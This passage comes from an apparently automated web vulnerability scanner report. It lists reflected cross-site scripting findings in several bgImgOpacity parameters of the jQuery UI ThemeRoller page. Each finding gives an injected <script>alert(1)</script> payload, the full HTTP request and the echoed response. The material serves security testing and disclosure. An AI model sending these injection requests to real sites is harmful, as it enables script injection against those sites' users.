This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.129. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f16e"><script>alert(1)</script>1d046989701 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.130. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685ca"><script>alert(1)</script>81a7908cbb4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

2.131. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae3f"><script>alert(1)</script>de2a08a5946 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

2.132. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c84"><script>alert(1)</script>41681df22b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.133. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e7f"><script>alert(1)</script>6bb1c029358 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

2.134. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab27f"><script>alert(1)</script>a6e6f66d6d2 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

2.135. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ebb"><script>alert(1)</script>14f1893d8d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

2.136. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcf0"><script>alert(1)</script>b47e37778d5 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.137. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2940e"><script>alert(1)</script>bb65b2d20eb was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&b